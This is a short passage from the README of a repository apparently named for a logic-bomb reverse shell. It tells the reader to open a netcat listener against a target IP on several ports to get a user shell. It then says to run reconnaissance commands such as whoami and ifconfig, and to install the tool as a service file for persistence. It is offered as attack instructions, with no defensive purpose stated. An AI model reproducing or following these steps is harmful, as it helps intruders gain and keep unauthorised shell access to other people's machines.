spwn3r49sd3r00/logicbomb-reverse-shell/README.md

 4. Open up another terminal and "nc -l 'target_ip' 7864/7777/7783/8348/8677/8999".
 This will spawn a user shell and you are in!
 Check whoami, pwd, ls, ifconfig.

+You can also bind this as a service file in order to avoid using '&' while building the file.

 Note:
 Initial Machine Access Required: yes